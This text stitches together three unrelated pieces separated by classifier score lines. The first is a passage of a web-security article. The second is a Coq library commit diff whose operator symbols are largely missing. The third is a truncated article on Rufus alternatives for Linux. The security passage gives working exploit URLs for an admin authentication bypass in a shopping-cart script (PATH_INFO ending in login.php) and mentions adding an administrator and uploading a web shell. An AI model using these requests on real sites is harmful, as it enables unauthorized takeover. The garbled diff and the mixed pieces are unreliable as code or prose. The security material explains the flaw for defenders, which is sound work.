trick the user to visit the page, while being logged in the application. This may be achieved with a spoofed e-mail, instant message, and so on.To protect users against such attacks, developers need to use anti-XSRF tokens in POST requests. Additionally, user actions, such as changing their passwords, should require an additional confirmation, usually, the users should enter the old passwords. Both CSS and CSRF attacks attempt to steal user accounts. This can also be achieved via attacking the Authentication and Authorization or Exploiting the Implementation We all know that assumptions are bad, but we still continue to assume. Fairly often the developers of the application make assumptions on how the authorization and the authentication of the users should work. These assumptions are sometimes wrong, and malicious users can conduct actions that do not always match whatever the developers have taken for granted. Let’s take one of the most famous shopping cart scripts for an example. Here is how the administrators of the application log in to the administrative interface. • The administrator accesses http://target.com/catalog/admin. • The script redirects to the login.php script. • The administrator enters their login credentials. • The script checks the login credentials. • If they are correct, the administrator is logged in. • If they are not correct, the script asks the user for their login credentials again. This is achieved by showing the login.php script to every unauthenticated user of the application. Let’s see part of the code of the script.The login.php script contains the following code: require('includes/application_top.php'); and here is the part of the application_top.php script that checks if the user is authenticated: // redirect to login page if administrator is not yet logged in if (!tep_session_is_registered('admin')) { $redirect = false; $current_page = bassename($PHP_SELF); if ($current_page != FILENAME_LOGIN) { if (!tep_session_is_registered('redirect_origin')) { tep_session_register('redirect_origin'); $redirect_origin = array('page' => $current_page, 'get' => $HTTP_GET_VARS); } $redirect = true; } if ($redirect == true) { tep_redirect(tep_href_link(FILENAME_LOGIN)); } unset($redirect); } What it basically does is check if the basename of $PHP_SELF is login.php. If it is login.php, then it serves the page; otherwise you will be redirected to login.php. Now, imaging that the attackers accesses the following URL: http://target.com/catalog/admin/file_manager.php/login.php The basename of $PHP_SELF is login.php, so the redirect is completely bypassed and the script renders the page, which, is of course, file_manager.php. The attacker can also make a POST request to http://target.com/catalog/admin/administrators.php/login.php?action=insert and add themselves as a site administrator, upload a Web shell, and so on, and so forth. Such vulnerabilities are due to mistakes in the programming. They are a bit harder to detect by the attackers, but they are extremely unpleasant, as they give access to the application to unauthenticated users. To avoid these vulnerabilities, the logic of the application has to be very well planned, and the the implementation should be thoroughly tested. Of course, there are other vulnerabilities , and attacks that are hybrids of the attacks described above. There is no post that can encompass them all. But we can safely say that these are the most common vulnerabilities and attacks on the Internet nowadays. In a follow-up post we will discuss the defense and the penetration tests as part of the defense. This article is translated to Serbo-Croatian language by Anja Skrba from Webhostinggeeks.com. Leave a Reply
__label__pos
0.6894
Commit 7d7c9871 authored by Robbert Krebbers's avatar Robbert Krebbers Set Hint Mode for all classes in `base.v`. This provides significant robustness against looping type class search. As a consequence, at many places throughout the library we had to add additional typing information to lemmas. This was to be expected, since most of the old lemmas were ambiguous. For example: Section fin_collection. Context `{FinCollection A C}. size_singleton (x : A) : size {[ x ]} = 1. In this case, the lemma does not tell us which `FinCollection` with elements `A` we are talking about. So, `{[ x ]}` could not only refer to the singleton operation of the `FinCollection A C` in the section, but also to any other `FinCollection` in the development. To make this lemma unambigious, it should be written as: Lemma size_singleton (x : A) : size ({[ x ]} : C) = 1. In similar spirit, lemmas like the one below were also ambiguous: Lemma lookup_alter_None {A} (f : A → A) m i j : alter f i m !! j = None m !! j = None. It is not clear which finite map implementation we are talking about. To make this lemma unambigious, it should be written as: Lemma lookup_alter_None {A} (f : A → A) (m : M A) i j : alter f i m !! j = None m !! j = None. That is, we have to specify the type of `m`. parent 24aef2fe ......@@ -94,6 +94,9 @@ Proof. split; repeat intro; congruence. Qed. (** We define an operational type class for setoid equality. This is based on (Spitters/van der Weegen, 2011). *) Class Equiv A := equiv: relation A. (* No Hint Mode set because of Coq bug #5735 Hint Mode Equiv ! : typeclass_instances. *) Infix "≡" := equiv (at level 70, no associativity) : C_scope. Notation "(≡)" := equiv (only parsing) : C_scope. Notation "( X ≡)" := (equiv X) (only parsing) : C_scope. ......@@ -108,10 +111,12 @@ with Leibniz equality. We provide the tactic [fold_leibniz] to transform such setoid equalities into Leibniz equalities, and [unfold_leibniz] for the reverse. *) Class LeibnizEquiv A `{Equiv A} := leibniz_equiv x y : x y x = y. Hint Mode LeibnizEquiv ! - : typeclass_instances. Lemma leibniz_equiv_iff `{LeibnizEquiv A, !Reflexive (@equiv A _)} (x y : A) : x y x = y. Proof. split. apply leibniz_equiv. intros ->; reflexivity. Qed. Ltac fold_leibniz := repeat match goal with | H : context [ @equiv ?A _ _ _ ] |- _ => ......@@ -149,12 +154,14 @@ propositions. For example to declare a parameter expressing decidable equality on a type [A] we write [`{∀ x y : A, Decision (x = y)}] and use it by writing [decide (x = y)]. *) Class Decision (P : Prop) := decide : {P} + {¬P}. Hint Mode Decision ! : typeclass_instances. Arguments decide _ {_} : assert. Notation EqDecision A := ( x y : A, Decision (x = y)). (** ** Inhabited types *) (** This type class collects types that are inhabited. *) Class Inhabited (A : Type) : Type := populate { inhabitant : A }. Hint Mode Inhabited ! : typeclass_instances. Arguments populate {_} _ : assert. (** ** Proof irrelevant types *) ......@@ -162,6 +169,7 @@ Arguments populate {_} _ : assert. elements of the type are equal. We use this notion only used for propositions, but by universe polymorphism we can generalize it. *) Class ProofIrrel (A : Type) : Prop := proof_irrel (x y : A) : x = y. Hint Mode ProofIrrel ! : typeclass_instances. (** ** Common properties *) (** These operational type classes allow us to refer to common mathematical ......@@ -625,14 +633,17 @@ relations on collections: the empty collection [∅], the union [(∪)], intersection [(∩)], and difference [(∖)], the singleton [{[_]}], the subset [(⊆)] and element of [(∈)] relation, and disjointess [(⊥)]. *) Class Empty A := empty: A. Hint Mode Empty ! : typeclass_instances. Notation "∅" := empty : C_scope. Instance empty_inhabited `(Empty A) : Inhabited A := populate . Class Top A := top : A. Hint Mode Top ! : typeclass_instances. Notation "⊤" := top : C_scope. Class Union A := union: A A A. Hint Mode Union ! : typeclass_instances. Instance: Params (@union) 2. Infix "∪" := union (at level 50, left associativity) : C_scope. Notation "(∪)" := union (only parsing) : C_scope. ......@@ -650,6 +661,7 @@ Arguments union_list _ _ _ !_ / : assert. Notation "⋃ l" := (union_list l) (at level 20, format "⋃ l") : C_scope. Class Intersection A := intersection: A A A. Hint Mode Intersection ! : typeclass_instances. Instance: Params (@intersection) 2. Infix "∩" := intersection (at level 40) : C_scope. Notation "(∩)" := intersection (only parsing) : C_scope. ......@@ -657,6 +669,7 @@ Notation "( x ∩)" := (intersection x) (only parsing) : C_scope. Notation "(∩ x )" := (λ y, intersection y x) (only parsing) : C_scope. Class Difference A := difference: A A A. Hint Mode Difference ! : typeclass_instances. Instance: Params (@difference) 2. Infix "∖" := difference (at level 40, left associativity) : C_scope. Notation "(∖)" := difference (only parsing) : C_scope. ......@@ -670,6 +683,7 @@ Infix "∖*∖**" := (zip_with (prod_zip (∖) (∖*))) (at level 50, left associativity) : C_scope. Class Singleton A B := singleton: A B. Hint Mode Singleton - ! : typeclass_instances. Instance: Params (@singleton) 3. Notation "{[ x ]}" := (singleton x) (at level 1) : C_scope. Notation "{[ x ; y ; .. ; z ]}" := ......@@ -681,6 +695,7 @@ Notation "{[ x , y , z ]}" := (singleton (x,y,z)) (at level 1, y at next level, z at next level) : C_scope. Class SubsetEq A := subseteq: relation A. Hint Mode SubsetEq ! : typeclass_instances. Instance: Params (@subseteq) 2. Infix "⊆" := subseteq (at level 70) : C_scope. Notation "(⊆)" := subseteq (only parsing) : C_scope. ......@@ -720,8 +735,10 @@ Notation "X ⊂ Y ⊂ Z" := (X ⊂ Y ∧ Y ⊂ Z) (at level 70, Y at next level) is used to create finite maps, finite sets, etc, and is typically different from the order [(⊆)]. *) Class Lexico A := lexico: relation A. Hint Mode Lexico ! : typeclass_instances. Class ElemOf A B := elem_of: A B Prop. Hint Mode ElemOf - ! : typeclass_instances. Instance: Params (@elem_of) 3. Infix "∈" := elem_of (at level 70) : C_scope. Notation "(∈)" := elem_of (only parsing) : C_scope. ......@@ -733,6 +750,7 @@ Notation "( x ∉)" := (λ X, x ∉ X) (only parsing) : C_scope. Notation "(∉ X )" := (λ x, x X) (only parsing) : C_scope. Class Disjoint A := disjoint : A A Prop. Hint Mode Disjoint ! : typeclass_instances. Instance: Params (@disjoint) 2. Infix "⊥" := disjoint (at level 70) : C_scope. Notation "(⊥)" := disjoint (only parsing) : C_scope. ......@@ -749,6 +767,7 @@ Hint Extern 0 (_ ⊥ _) => symmetry; eassumption. Hint Extern 0 (_ * _) => symmetry; eassumption. Class DisjointE E A := disjointE : E A A Prop. Hint Mode DisjointE - ! : typeclass_instances. Instance: Params (@disjointE) 4. Notation "X ⊥{ Γ } Y" := (disjointE Γ X Y) (at level 70, format "X ⊥{ Γ } Y") : C_scope. ......@@ -765,11 +784,14 @@ Notation "Xs ⊥{ Γ1 , Γ2 , .. , Γ3 }* Ys" := Hint Extern 0 (_ {_} _) => symmetry; eassumption. Class DisjointList A := disjoint_list : list A Prop. Hint Mode DisjointList ! : typeclass_instances. Instance: Params (@disjoint_list) 2. Notation "⊥ Xs" := (disjoint_list Xs) (at level 20, format "⊥ Xs") : C_scope. Section disjoint_list. Context `{Disjoint A, Union A, Empty A}. Implicit Types X : A. Inductive disjoint_list_default : DisjointList A := | disjoint_nil_2 : (@nil A) | disjoint_cons_2 (X : A) (Xs : list A) : X Xs Xs (X :: Xs). ......@@ -782,8 +804,10 @@ Section disjoint_list. End disjoint_list. Class Filter A B := filter: (P : A Prop) `{ x, Decision (P x)}, B B. Hint Mode Filter - ! : typeclass_instances. Class UpClose A B := up_close : A B. Hint Mode UpClose - ! : typeclass_instances. Notation "↑ x" := (up_close x) (at level 20, format "↑ x"). (** * Monadic operations *) ......@@ -850,6 +874,7 @@ Notation "'guard' P 'as' H ; o" := (mguard P (λ H, o)) on maps. In the file [fin_maps] we will axiomatize finite maps. The function look up [m !! k] should yield the element at key [k] in [m]. *) Class Lookup (K A M : Type) := lookup: K M option A. Hint Mode Lookup - - ! : typeclass_instances. Instance: Params (@lookup) 4. Notation "m !! i" := (lookup i m) (at level 20) : C_scope. Notation "(!!)" := lookup (only parsing) : C_scope. ......@@ -859,12 +884,14 @@ Arguments lookup _ _ _ _ !_ !_ / : simpl nomatch, assert. (** The singleton map *) Class SingletonM K A M := singletonM: K A M. Hint Mode SingletonM - - ! : typeclass_instances. Instance: Params (@singletonM) 5. Notation "{[ k := a ]}" := (singletonM k a) (at level 1) : C_scope. (** The function insert [<[k:=a]>m] should update the element at key [k] with value [a] in [m]. *) Class Insert (K A M : Type) := insert: K A M M. Hint Mode Insert - - ! : typeclass_instances. Instance: Params (@insert) 5. Notation "<[ k := a ]>" := (insert k a) (at level 5, right associativity, format "<[ k := a ]>") : C_scope. ......@@ -874,12 +901,14 @@ Arguments insert _ _ _ _ !_ _ !_ / : simpl nomatch, assert. [m]. If the key [k] is not a member of [m], the original map should be returned. *) Class Delete (K M : Type) := delete: K M M. Hint Mode Delete - ! : typeclass_instances. Instance: Params (@delete) 4. Arguments delete _ _ _ !_ !_ / : simpl nomatch, assert. (** The function [alter f k m] should update the value at key [k] using the function [f], which is called with the original value. *) Class Alter (K A M : Type) := alter: (A A) K M M. Hint Mode Alter - - ! : typeclass_instances. Instance: Params (@alter) 5. Arguments alter {_ _ _ _} _ !_ !_ / : simpl nomatch, assert. ......@@ -889,12 +918,14 @@ if [k] is not a member of [m]. The value at [k] should be deleted if [f] yields [None]. *) Class PartialAlter (K A M : Type) := partial_alter: (option A option A) K M M. Hint Mode PartialAlter - - ! : typeclass_instances. Instance: Params (@partial_alter) 4. Arguments partial_alter _ _ _ _ _ !_ !_ / : simpl nomatch, assert. (** The function [dom C m] should yield the domain of [m]. That is a finite collection of type [C] that contains the keys that are a member of [m]. *) Class Dom (M C : Type) := dom: M C. Hint Mode Dom ! ! : typeclass_instances. Instance: Params (@dom) 3. Arguments dom : clear implicits. Arguments dom {_} _ {_} !_ / : simpl nomatch, assert. ......@@ -903,6 +934,7 @@ Arguments dom {_} _ {_} !_ / : simpl nomatch, assert. constructing a new map whose value at key [k] is [f (m1 !! k) (m2 !! k)].*) Class Merge (M : Type Type) := merge: {A B C}, (option A option B option C) M A M B M C. Hint Mode Merge ! : typeclass_instances. Instance: Params (@merge) 4. Arguments merge _ _ _ _ _ _ !_ !_ / : simpl nomatch, assert. ......@@ -911,17 +943,20 @@ and [m2] using the function [f] to combine values of members that are in both [m1] and [m2]. *) Class UnionWith (A M : Type) := union_with: (A A option A) M M M. Hint Mode UnionWith - ! : typeclass_instances. Instance: Params (@union_with) 3. Arguments union_with {_ _ _} _ !_ !_ / : simpl nomatch, assert. (** Similarly for intersection and difference. *) Class IntersectionWith (A M : Type) := intersection_with: (A A option A) M M M. Hint Mode IntersectionWith - ! : typeclass_instances. Instance: Params (@intersection_with) 3. Arguments intersection_with {_ _ _} _ !_ !_ / : simpl nomatch, assert. Class DifferenceWith (A M : Type) := difference_with: (A A option A) M M M. Hint Mode DifferenceWith - ! : typeclass_instances. Instance: Params (@difference_with) 3. Arguments difference_with {_ _ _} _ !_ !_ / : simpl nomatch, assert. ......@@ -930,6 +965,7 @@ Definition intersection_with_list `{IntersectionWith A M} Arguments intersection_with_list _ _ _ _ _ !_ / : assert. Class LookupE (E K A M : Type) := lookupE: E K M option A. Hint Mode LookupE - - - ! : typeclass_instances. Instance: Params (@lookupE) 6. Notation "m !!{ Γ } i" := (lookupE Γ i m) (at level 20, format "m !!{ Γ } i") : C_scope. ......@@ -937,6 +973,7 @@ Notation "(!!{ Γ } )" := (lookupE Γ) (only parsing, Γ at level 1) : C_scope. Arguments lookupE _ _ _ _ _ _ !_ !_ / : simpl nomatch, assert. Class InsertE (E K A M : Type) := insertE: E K A M M. Hint Mode InsertE - - - ! : typeclass_instances. Instance: Params (@insertE) 6. Notation "<[ k := a ]{ Γ }>" := (insertE Γ k a) (at level 5, right associativity, format "<[ k := a ]{ Γ }>") : C_scope. ......@@ -963,6 +1000,7 @@ Class Collection A C `{ElemOf A C, Empty C, Singleton A C, enumerated as a list. These elements, given by the [elements] function, may be in any order and should not contain duplicates. *) Class Elements A C := elements: C list A. Hint Mode Elements - ! : typeclass_instances. Instance: Params (@elements) 3. (** We redefine the standard library's [In] and [NoDup] using type classes. *) ......@@ -998,6 +1036,7 @@ Class FinCollection A C `{ElemOf A C, Empty C, Singleton A C, Union C, NoDup_elements X : NoDup (elements X) }. Class Size C := size: C nat. Hint Mode Size ! : typeclass_instances. Arguments size {_ _} !_ / : simpl nomatch, assert. Instance: Params (@size) 2. ......@@ -1025,6 +1064,7 @@ Class CollectionMonad M `{∀ A, ElemOf A (M A), will later prove that [fresh] is [Proper] with respect to the induced setoid equality on collections. *) Class Fresh A C := fresh: C A. Hint Mode Fresh - ! : typeclass_instances. Instance: Params (@fresh) 3. Class FreshSpec A C `{ElemOf A C, Empty C, Singleton A C, Union C, Fresh A C} : Prop := { ......@@ -1035,5 +1075,6 @@ Class FreshSpec A C `{ElemOf A C, (** * Miscellaneous *) Class Half A := half: A A. Hint Mode Half ! : typeclass_instances. Notation "½" := half : C_scope. Notation "½*" := (fmap (M:=list) half) : C_scope. ......@@ -427,7 +427,7 @@ Proof. rewrite !coPset_finite_spec; destruct X as [t Ht]; simpl; clear Ht. induction t as [[]|]; simpl; rewrite ?coPset_finite_node, ?andb_True; tauto. Qed. Lemma coPset_split X : Lemma coPset_split (X : coPset) : ¬set_finite X X1 X2, X = X1 X2 X1 X2 = ¬set_finite X1 ¬set_finite X2. Proof. ...... ......@@ -145,9 +145,9 @@ Section set_unfold_simple. Implicit Types x y : A. Implicit Types X Y : C. Global Instance set_unfold_empty x : SetUnfold (x ) False. Global Instance set_unfold_empty x : SetUnfold (x ( : C)) False. Proof. constructor. split. apply not_elem_of_empty. done. Qed. Global Instance set_unfold_singleton x y : SetUnfold (x {[ y ]}) (x = y). Global Instance set_unfold_singleton x y : SetUnfold (x ({[ y ]} : C)) (x = y). Proof. constructor; apply elem_of_singleton. Qed. Global Instance set_unfold_union x X Y P Q : SetUnfold (x X) P SetUnfold (x Y) Q SetUnfold (x X Y) (P Q). ......@@ -161,30 +161,30 @@ Section set_unfold_simple. ( x, SetUnfold (x X) (P x)) SetUnfold ( X) ( x, ¬P x) | 5. Proof. intros ?; constructor. unfold equiv, collection_equiv. pose proof not_elem_of_empty; naive_solver. pose proof (not_elem_of_empty (C:=C)); naive_solver. Qed. Global Instance set_unfold_equiv_empty_r (P : A Prop) : Global Instance set_unfold_equiv_empty_r (P : A Prop) X : ( x, SetUnfold (x X) (P x)) SetUnfold (X ) ( x, ¬P x) | 5. Proof. intros ?; constructor. unfold equiv, collection_equiv. pose proof not_elem_of_empty; naive_solver. pose proof (not_elem_of_empty (C:=C)); naive_solver. Qed. Global Instance set_unfold_equiv (P Q : A Prop) : Global Instance set_unfold_equiv (P Q : A Prop) X : ( x, SetUnfold (x X) (P x)) ( x, SetUnfold (x Y) (Q x)) SetUnfold (X Y) ( x, P x Q x) | 10. Proof. constructor. apply forall_proper; naive_solver. Qed. Global Instance set_unfold_subseteq (P Q : A Prop) : Global Instance set_unfold_subseteq (P Q : A Prop) X Y : ( x, SetUnfold (x X) (P x)) ( x, SetUnfold (x Y) (Q x)) SetUnfold (X Y) ( x, P x Q x). Proof. constructor. apply forall_proper; naive_solver. Qed. Global Instance set_unfold_subset (P Q : A Prop) : Global Instance set_unfold_subset (P Q : A Prop) X : ( x, SetUnfold (x X) (P x)) ( x, SetUnfold (x Y) (Q x)) SetUnfold (X Y) (( x, P x Q x) ¬∀ x, Q x P x). Proof. constructor. unfold strict. repeat f_equiv; apply forall_proper; naive_solver. Qed. Global Instance set_unfold_disjoint (P Q : A Prop) : Global Instance set_unfold_disjoint (P Q : A Prop) X Y : ( x, SetUnfold (x X) (P x)) ( x, SetUnfold (x Y) (Q x)) SetUnfold (X Y) ( x, P x Q x False). Proof. constructor. unfold disjoint, collection_disjoint. naive_solver. Qed. ......@@ -195,10 +195,10 @@ Section set_unfold_simple. Global Instance set_unfold_equiv_empty_l_L X (P : A Prop) : ( x, SetUnfold (x X) (P x)) SetUnfold ( = X) ( x, ¬P x) | 5. Proof. constructor. unfold_leibniz. by apply set_unfold_equiv_empty_l. Qed. Global Instance set_unfold_equiv_empty_r_L (P : A Prop) : Global Instance set_unfold_equiv_empty_r_L (P : A Prop) X : ( x, SetUnfold (x X) (P x)) SetUnfold (X = ) ( x, ¬P x) | 5. Proof. constructor. unfold_leibniz. by apply set_unfold_equiv_empty_r. Qed. Global Instance set_unfold_equiv_L (P Q : A Prop) : Global Instance set_unfold_equiv_L (P Q : A Prop) X Y : ( x, SetUnfold (x X) (P x)) ( x, SetUnfold (x Y) (Q x)) SetUnfold (X = Y) ( x, P x Q x) | 10. Proof. constructor. unfold_leibniz. by apply set_unfold_equiv. Qed. ......@@ -224,20 +224,20 @@ Section set_unfold. End set_unfold. Section set_unfold_monad. Context `{CollectionMonad M} {A : Type}. Implicit Types x y : A. Context `{CollectionMonad M}. Global Instance set_unfold_ret x y : SetUnfold (x mret y) (x = y). Global Instance set_unfold_ret {A} (x y : A) : SetUnfold (x mret (M:=M) y) (x = y). Proof. constructor; apply elem_of_ret. Qed. Global Instance set_unfold_bind {B} (f : A M B) X (P Q : A Prop) : Global Instance set_unfold_bind {A B} (f : A M B) X (P Q : A Prop) : ( y, SetUnfold (y X) (P y)) ( y, SetUnfold (x f y) (Q y)) SetUnfold (x X = f) ( y, Q y P y). Proof. constructor. rewrite elem_of_bind; naive_solver. Qed. Global Instance set_unfold_fmap {B} (f : A B) X (P : A Prop) : Global Instance set_unfold_fmap {A B} (f : A B) (X : M A) (P : A Prop) : ( y, SetUnfold (y X) (P y)) SetUnfold (x f <$> X) ( y, x = f y P y). Proof. constructor. rewrite elem_of_fmap; naive_solver. Qed. Global Instance set_unfold_join (X : M (M A)) (P : M A Prop) : Global Instance set_unfold_join {A} (X : M (M A)) (P : M A Prop) : ( Y, SetUnfold (Y X) (P Y)) SetUnfold (x mjoin X) ( Y, x Y P Y). Proof. constructor. rewrite elem_of_join; naive_solver. Qed. End set_unfold_monad. ......@@ -381,7 +381,7 @@ Section simple_collection. Proof. set_solver. Qed. Lemma elem_of_equiv_empty X : X x, x X. Proof. set_solver. Qed. Lemma elem_of_empty x : x False. Lemma elem_of_empty x : x ( : C) False. Proof. set_solver. Qed. Lemma equiv_empty X : X X . Proof. set_solver. Qed. ......@@ -393,15 +393,15 @@ Section simple_collection. Proof. set_solver. Qed. (** Singleton *) Lemma elem_of_singleton_1 x y : x {[y]} x = y. Lemma elem_of_singleton_1 x y : x ({[y]} : C) x = y. Proof. by rewrite elem_of_singleton. Qed. Lemma elem_of_singleton_2 x y : x = y x {[y]}. Lemma elem_of_singleton_2 x y : x = y x ({[y]} : C). Proof. by rewrite elem_of_singleton. Qed. Lemma elem_of_subseteq_singleton x X : x X {[ x ]} X. Proof. set_solver. Qed. Lemma non_empty_singleton x : ({[ x ]} : C) . Proof. set_solver. Qed. Lemma not_elem_of_singleton x y : x {[ y ]} x y. Lemma not_elem_of_singleton x y : x ({[ y ]} : C) x y. Proof. by rewrite elem_of_singleton. Qed. (** Disjointness *) ......@@ -512,7 +512,7 @@ Section simple_collection. Proof. unfold_leibniz. apply non_empty_inhabited. Qed. (** Singleton *) Lemma non_empty_singleton_L x : {[ x ]} . Lemma non_empty_singleton_L x : {[ x ]} ( : C). Proof. unfold_leibniz. apply non_empty_singleton. Qed. (** Big unions *) ......@@ -554,6 +554,7 @@ End simple_collection. (** * Collections with [∪], [∩], [∖], [∅] and [{[_]}] *) Section collection. Context `{Collection A C}. Implicit Types x y : A. Implicit Types X Y : C. (** Intersection *) ......@@ -654,7 +655,7 @@ Section collection. Global Instance intersection_empty_r_L: RightAbsorb ((=) : relation C) (). Proof. intros ?. unfold_leibniz. apply (right_absorb _ _). Qed. Lemma intersection_singletons_L x : {[x]} {[x]} = {[x]}. Lemma intersection_singletons_L x : {[x]} {[x]} = ({[x]} : C). Proof. unfold_leibniz. apply intersection_singletons. Qed. Lemma union_intersection_l_L X Y Z : X (Y Z) = (X Y) (X Z). ......@@ -719,7 +720,7 @@ Section collection. {[x]} (X Y) ({[x]} X) (Y {[x]}). Proof. intro y; split; intros Hy; [ set_solver | ]. destruct (decide (y {[x]})); set_solver. destruct (decide (y ({[x]} : C))); set_solver. Qed. Context `{!LeibnizEquiv C}. ......@@ -736,7 +737,6 @@ Section collection. Lemma singleton_union_difference_L X Y x : {[x]} (X Y) = ({[x]} X) (Y {[x]}). Proof. unfold_leibniz. apply singleton_union_difference. Qed. End dec. End collection. ......@@ -751,26 +751,26 @@ Section of_option_list. Context `{SimpleCollection A C}. Implicit Types l : list A. Lemma elem_of_of_option (x : A) mx: x of_option mx mx = Some x. Lemma elem_of_of_option (x : A) mx: x of_option (C:=C) mx mx = Some x. Proof. destruct mx; set_solver. Qed. Lemma not_elem_of_of_option (x : A) mx: x of_option mx mx Some x. Lemma not_elem_of_of_option (x : A) mx: x of_option (C:=C) mx mx Some x. Proof. by rewrite elem_of_of_option. Qed. Lemma elem_of_of_list (x : A) l : x of_list l x l. Lemma elem_of_of_list (x : A) l : x of_list (C:=C) l x l. Proof. split. - induction l; simpl; [by rewrite elem_of_empty|]. rewrite elem_of_union,elem_of_singleton; intros [->|?]; constructor; auto. - induction 1; simpl; rewrite elem_of_union, elem_of_singleton; auto. Qed. Lemma not_elem_of_of_list (x : A) l : x of_list l x l. Lemma not_elem_of_of_list (x : A) l : x of_list (C:=C) l x l. Proof. by rewrite elem_of_of_list. Qed. Global Instance set_unfold_of_option (mx : option A) x : SetUnfold (x of_option mx) (mx = Some x). SetUnfold (x of_option (C:=C) mx) (mx = Some x). Proof. constructor; apply elem_of_of_option. Qed. Global Instance set_unfold_of_list (l : list A) x P : SetUnfold (x l) P SetUnfold (x of_list l) P. SetUnfold (x l) P SetUnfold (x of_list (C:=C) l) P. Proof. constructor. by rewrite elem_of_of_list, (set_unfold (x l) P). Qed. Lemma of_list_nil : of_list (C:=C) [] = . ......@@ -810,7 +810,7 @@ Section collection_monad_base. rewrite !elem_of_equiv_empty; setoid_rewrite elem_of_guard. destruct (decide P); naive_solver. Qed. Global Instance set_unfold_guard `{Decision P} {A} (x : A) X Q : Global Instance set_unfold_guard `{Decision P} {A} (x : A) (X : M A) Q : SetUnfold (x X) Q SetUnfold (x guard P; X) (P Q). Proof. constructor. by rewrite elem_of_guard, (set_unfold (x X) Q). Qed. Lemma bind_empty {A B} (f : A M B) X : ......@@ -824,11 +824,12 @@ Definition set_Forall `{ElemOf A C} (P : A → Prop) (X : C) := ∀ x, x ∈ X Definition set_Exists `{ElemOf A C} (P : A Prop) (X : C) := x, x X P x. Section quantifiers. Context `{SimpleCollection A B} (P : A Prop). Context `{SimpleCollection A C} (P : A Prop). Implicit Types X Y : C. Lemma set_Forall_empty : set_Forall P . Lemma set_Forall_empty : set_Forall P ( : C). Proof. unfold set_Forall. set_solver. Qed. Lemma set_Forall_singleton x : set_Forall P {[ x ]} P x. Lemma set_Forall_singleton x : set_Forall P ({[ x ]} : C) P x. Proof. unfold set_Forall. set_solver. Qed. Lemma set_Forall_union X Y : set_Forall P X set_Forall P Y set_Forall P (X Y). ......@@ -838,9 +839,9 @@ Section quantifiers. Lemma set_Forall_union_inv_2 X Y : set_Forall P (X Y) set_Forall P Y. Proof. unfold set_Forall. set_solver. Qed. Lemma set_Exists_empty : ¬set_Exists P . Lemma set_Exists_empty : ¬set_Exists P ( : C). Proof. unfold set_Exists. set_solver. Qed. Lemma set_Exists_singleton x : set_Exists P {[ x ]} P x. Lemma set_Exists_singleton x : set_Exists P ({[ x ]} : C) P x. Proof. unfold set_Exists. set_solver. Qed. Lemma set_Exists_union_1 X Y : set_Exists P X set_Exists P (X Y). Proof. unfold set_Exists. set_solver. Qed. ......@@ -852,7 +853,8 @@ Section quantifiers. End quantifiers. Section more_quantifiers. Context `{SimpleCollection A B}. Context `{SimpleCollection A C}. Implicit Types X : C. Lemma set_Forall_impl (P Q : A Prop) X : set_Forall P X ( x, P x Q x) set_Forall Q X. ......@@ -987,15 +989,17 @@ End collection_monad. Definition set_finite `{ElemOf A B} (X : B) := l : list A, x, x X x l. Section finite. Context `{SimpleCollection A B}. Context `{SimpleCollection A C}. Implicit Types X Y : C. Global Instance set_finite_subseteq : Proper (flip () ==> impl) (@set_finite A B _). Proper (flip () ==> impl) (@set_finite A C _). Proof. intros X Y HX [l Hl]; exists l; set_solver. Qed. Global Instance set_finite_proper : Proper (() ==> iff) (@set_finite A B _). Global Instance set_finite_proper : Proper (() ==> iff) (@set_finite A C _). Proof. intros X Y HX; apply exist_proper. by setoid_rewrite HX. Qed. Lemma empty_finite : set_finite . Lemma empty_finite : set_finite ( : C). Proof. by exists []; intros ?; rewrite elem_of_empty. Qed. Lemma singleton_finite (x : A) : set_finite {[ x ]}. Lemma singleton_finite (x : A) : set_finite ({[ x ]} : C). Proof. exists [x]; intros y ->%elem_of_singleton; left. Qed. Lemma union_finite X Y : set_finite X set_finite Y set_finite (X Y). Proof. ......@@ -1009,7 +1013,9 @@ Section finite.
__label__pos
0.63076
Is There Rufus for Linux? Introduction In the world of software tools, Rufus has gained a stellar reputation for creating bootable USB drives efficiently and effectively. But the burning question on the minds of Linux users is, “Is there Rufus for Linux?” In this detailed guide, we will delve deep into this topic, providing you with valuable insights, step-by-step instructions, and expert opinions. Is there Rufus for Linux? Before we dive into the details, let’s address the burning question: Is there Rufus for Linux? Unfortunately, Rufus is not available as a native Linux application. However, Linux users need not despair, as there are alternative solutions that can serve as excellent replacements for Rufus on a Linux platform. Exploring Rufus Alternatives for Linux While Rufus may not have a dedicated Linux version, several alternative tools can accomplish similar tasks with ease. These tools are specifically designed to work seamlessly with Linux distributions. Here are some noteworthy Rufus alternatives for Linux: 1. Balena Etcher: This open-source tool is a popular choice among Linux users for creating bootable USB drives. Its user-friendly interface and compatibility with various Linux distributions make it an excellent option. 2. UNetbootin: UNetbootin is another reliable choice that supports Linux. It allows you to create bootable USB drives with ease and offers compatibility with a wide range of Linux distributions. 3. dd Command: For the command-line enthusiasts, the ‘dd’ command can be a powerful tool to create bootable USB drives on Linux. It requires some knowledge of the command line but provides precise control. 4. Ventoy: Ventoy is a unique bootable USB drive creator that works well with Linux. What sets it apart is its ability to create multi-boot USB drives, allowing you to store multiple ISOs on a single drive. 5. Rufus through Wine: While not a native Linux application, some users have reported success running Rufus on Linux using Wine, a compatibility layer. However, this method may not work flawlessly for everyone. How to Use Rufus Alternatives on Linux Now that we’ve explored Rufus alternatives let’s dive into using one of them, Balena Etcher, as an example: 1. Download Balena Etcher: Visit the official Balena Etcher website and download the Linux version compatible with your distribution. 2. Install Balena Etcher: Once downloaded, install Balena Etcher on your Linux system by following the installation instructions provided on their website. 3. Launch Balena Etcher: After installation, launch the application. 4. Select ISO Image: Click on the “Select Image” button and choose the ISO file you want to create a bootable USB drive from. 5. Insert USB Drive: Insert your USB drive into your computer’s USB port. 6. Choose Target Drive: In Balena Etcher, select the USB drive as the target for your bootable image. 7. Start the Process: Click the “Flash!” button to start the process. Balena Etcher will create a bootable USB drive from the ISO image. 8. Eject and Use: Once the process is complete, safely eject the USB drive and use it to boot your Linux system. FAQs Can I use Rufus on Linux? No, Rufus does not have a native Linux version. However, there are alternative tools available that can be used to create bootable USB drives on Linux, as mentioned in this guide. Is Balena Etcher compatible with all Linux distributions? Yes, Balena Etcher is compatible with a wide range of Linux distributions, making it a versatile choice for creating bootable USB drives. Are there any command-line options for creating bootable USB drives on Linux? Yes, Linux users can utilize the ‘dd’ command, a powerful command-line tool, to create bootable USB drives with precision and control. Can I create a multi-boot USB drive on Linux? Yes, Ventoy is a tool that allows you to create multi-boot USB drives on Linux, enabling you to store and boot from multiple ISOs on a single drive. Is Wine a reliable option to run Rufus on Linux? Wine can be used to run Rufus on Linux, but it may not work seamlessly for all users. It’s advisable to explore 